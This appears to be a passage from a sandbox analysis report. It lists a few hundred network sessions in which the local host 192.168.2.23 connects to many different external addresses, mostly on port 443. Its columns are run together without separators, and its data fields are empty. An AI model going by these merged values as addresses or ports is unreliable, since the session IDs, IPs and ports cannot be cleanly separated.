                                        12948192.168.2.234430642.8.115.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12949192.168.2.2337314166.34.248.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12950192.168.2.2337052207.172.244.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12951192.168.2.234545893.115.20.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12952192.168.2.234525679.64.167.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12953192.168.2.235011078.143.155.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12954192.168.2.234701445.39.59.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12955192.168.2.2350130130.30.93.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12956192.168.2.2332850101.181.211.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12957192.168.2.2336238179.90.125.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12958192.168.2.2340740195.161.25.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12959192.168.2.2336800112.226.10.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12960192.168.2.234146064.190.11.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12961192.168.2.2339534147.136.42.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12962192.168.2.236039462.115.138.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12963192.168.2.2349336204.78.189.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12964192.168.2.2341080135.202.215.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12965192.168.2.235622080.168.135.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12966192.168.2.235991694.135.224.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12967192.168.2.233680082.211.221.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12968192.168.2.2356748162.232.159.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12969192.168.2.2339340147.190.163.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12970192.168.2.2350402203.22.223.1658080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12971192.168.2.2336504122.230.25.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12972192.168.2.2356470130.249.72.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12973192.168.2.235994293.183.55.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12974192.168.2.235680837.250.223.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12975192.168.2.2344814130.154.184.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12976192.168.2.2334282163.218.2.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12977192.168.2.235541477.106.141.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12978192.168.2.2360066160.61.210.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12979192.168.2.2360880223.127.0.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12980192.168.2.234992665.189.60.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12981192.168.2.234516458.221.153.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12982192.168.2.2349652174.246.46.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12983192.168.2.234584280.57.185.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12984192.168.2.235169049.40.221.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12985192.168.2.2351444165.80.115.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12986192.168.2.2356692202.112.201.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12987192.168.2.2343040131.181.75.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12988192.168.2.234172234.129.101.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12989192.168.2.235130842.126.233.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12990192.168.2.233754057.56.100.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12991192.168.2.2347918118.203.144.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12992192.168.2.234354457.178.51.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12993192.168.2.2341720132.62.57.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12994192.168.2.2347562179.161.76.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12995192.168.2.235823470.171.102.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12996192.168.2.234634414.170.164.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12997192.168.2.23420521.176.49.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12998192.168.2.235453493.56.56.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12999192.168.2.2335022123.38.139.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13000192.168.2.2352864209.170.242.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13001192.168.2.2337670156.37.184.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13002192.168.2.234374087.223.74.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13003192.168.2.233835072.128.179.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13004192.168.2.234076496.0.156.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13005192.168.2.23414104.195.179.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13006192.168.2.2352928117.67.121.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13007192.168.2.2341250142.248.89.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13008192.168.2.2336276161.100.54.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13009192.168.2.2347540154.92.252.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13010192.168.2.2358036195.102.2.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13011192.168.2.234946675.80.71.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13012192.168.2.2353696173.45.141.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13013192.168.2.2350548144.157.31.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13014192.168.2.235624627.215.252.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13015192.168.2.234515479.227.1.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13016192.168.2.2333418213.24.95.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13017192.168.2.2349046212.168.206.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13018192.168.2.234888647.70.85.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13019192.168.2.2352420212.124.92.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13020192.168.2.2349602213.232.93.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13021192.168.2.2346318126.142.249.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13022192.168.2.235137849.83.80.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13023192.168.2.233474244.24.241.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13024192.168.2.235335034.219.45.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13025192.168.2.235595212.73.45.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13026192.168.2.234032298.229.76.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13027192.168.2.234954277.19.41.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13028192.168.2.2336624189.148.156.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13029192.168.2.2358514221.35.235.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13030192.168.2.2354674180.190.214.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13031192.168.2.2354460104.14.234.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13032192.168.2.2356202167.46.77.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13033192.168.2.2344916212.36.127.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13034192.168.2.2341836222.234.179.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13035192.168.2.2340620160.116.49.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13036192.168.2.234253893.42.167.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13037192.168.2.2347502198.59.125.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13038192.168.2.235137641.217.200.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13039192.168.2.2345432116.227.52.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13040192.168.2.233579696.49.9.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13041192.168.2.2354374148.34.218.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13042192.168.2.2340838170.43.176.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13043192.168.2.2359208139.114.45.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13044192.168.2.2341880182.149.21.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13045192.168.2.2349408165.207.110.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13046192.168.2.235090671.135.228.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13047192.168.2.233882825.61.172.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13048192.168.2.2358292111.60.82.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13049192.168.2.2341922189.171.90.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13050192.168.2.23454682.195.177.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13051192.168.2.2349002151.196.37.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13052192.168.2.233603883.92.205.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13053192.168.2.2352580143.211.168.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13054192.168.2.2360662135.245.17.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13055192.168.2.235584669.247.127.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13056192.168.2.2337756169.232.103.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13057192.168.2.2342288202.152.151.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13058192.168.2.2343398113.76.51.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13059192.168.2.2359690128.93.240.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13060192.168.2.234850667.10.82.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13061192.168.2.234474642.141.123.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13062192.168.2.235725468.51.86.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13063192.168.2.234003098.178.218.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13064192.168.2.2349438151.48.193.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13065192.168.2.2346562158.140.196.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13066192.168.2.233515658.140.103.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13067192.168.2.2344620191.171.36.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13068192.168.2.235422263.155.170.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13069192.168.2.2343580119.129.3.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13070192.168.2.2351494110.243.111.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13071192.168.2.2333130184.92.172.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13072192.168.2.233834014.235.173.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13073192.168.2.233559066.182.79.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13074192.168.2.2354398116.126.232.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13075192.168.2.2344878107.78.185.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13076192.168.2.2356156213.172.100.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13077192.168.2.235324043.123.146.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13078192.168.2.2339736102.77.86.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13079192.168.2.234578235.85.232.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13080192.168.2.234756223.2.221.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13081192.168.2.233417295.243.37.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13082192.168.2.23467269.166.72.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13083192.168.2.233668249.113.176.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13084192.168.2.2359752166.205.144.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13085192.168.2.2357616139.30.188.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13086192.168.2.2339138219.81.49.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13087192.168.2.2347874119.167.76.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13088192.168.2.2351476162.255.180.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13089192.168.2.2349496145.210.219.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13090192.168.2.233340859.170.228.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13091192.168.2.2337280187.114.109.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13092192.168.2.235687835.37.134.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13093192.168.2.234191069.40.102.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13094192.168.2.233797034.28.124.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13095192.168.2.2357470120.18.224.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13096192.168.2.235522275.4.62.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13097192.168.2.2336866117.219.179.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13098192.168.2.2335418171.28.248.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13099192.168.2.235346253.205.237.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13100192.168.2.234656648.193.37.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13101192.168.2.2340062106.29.225.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13102192.168.2.2335962171.217.156.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13103192.168.2.2333554210.108.25.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13104192.168.2.2349294190.206.22.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13105192.168.2.2351030199.55.222.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13106192.168.2.2350850207.61.205.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13107192.168.2.2349394212.18.250.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13108192.168.2.234573279.48.216.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13109192.168.2.2339992205.13.222.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13110192.168.2.2349328121.117.97.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13111192.168.2.234151669.171.177.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13112192.168.2.2338974198.75.164.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13113192.168.2.2351840122.58.186.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13114192.168.2.2356580199.44.138.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13115192.168.2.234607641.240.231.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13116192.168.2.2342718213.75.54.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13117192.168.2.233970220.244.150.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13118192.168.2.2358898196.114.245.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13119192.168.2.2341582171.56.95.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13120192.168.2.2334356198.160.244.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13121192.168.2.234231220.225.79.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13122192.168.2.2359218116.109.241.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13123192.168.2.235194627.100.145.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13124192.168.2.233992020.80.17.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13125192.168.2.2345634173.108.109.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13126192.168.2.234628425.91.21.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13127192.168.2.2338754191.101.5.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13128192.168.2.23570364.61.210.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13129192.168.2.2347990125.230.195.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13130192.168.2.2358232192.39.211.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13131192.168.2.2359052104.80.44.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13132192.168.2.234443818.88.92.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13133192.168.2.2359462139.153.47.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13134192.168.2.234922431.144.55.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13135192.168.2.234645677.94.229.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13136192.168.2.2343088125.4.129.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13137192.168.2.2349666137.171.167.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13138192.168.2.2342178107.33.224.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13139192.168.2.235779227.133.13.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13140192.168.2.2348438167.39.112.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13141192.168.2.2341702102.31.182.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13142192.168.2.235153659.63.94.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13143192.168.2.2357014152.4.3.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13144192.168.2.2350288168.29.44.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13145192.168.2.2339870196.176.210.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13146192.168.2.2349746157.141.197.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13147192.168.2.2357280134.30.154.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13148192.168.2.2342218168.240.211.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13149192.168.2.234771052.82.23.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13150192.168.2.2333982219.139.101.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13151192.168.2.2351904150.242.185.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13152192.168.2.234579699.159.34.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13153192.168.2.234200014.210.104.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13154192.168.2.2343046105.229.232.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13155192.168.2.2337850110.132.79.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13156192.168.2.2335790160.119.152.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13157192.168.2.235001245.211.114.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13158192.168.2.2355304200.160.178.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13159192.168.2.2348842205.55.204.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13160192.168.2.2350888108.3.51.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13161192.168.2.233603442.98.3.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13162192.168.2.2359212183.172.107.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13163192.168.2.235002681.66.28.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13164192.168.2.2341072160.110.60.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13165192.168.2.2336932132.247.63.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13166192.168.2.23535265.186.243.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13167192.168.2.2348746206.56.7.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13168192.168.2.23563604.255.81.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13169192.168.2.2349050151.62.136.245443
                                        TimestampBytes transferredDirectionData


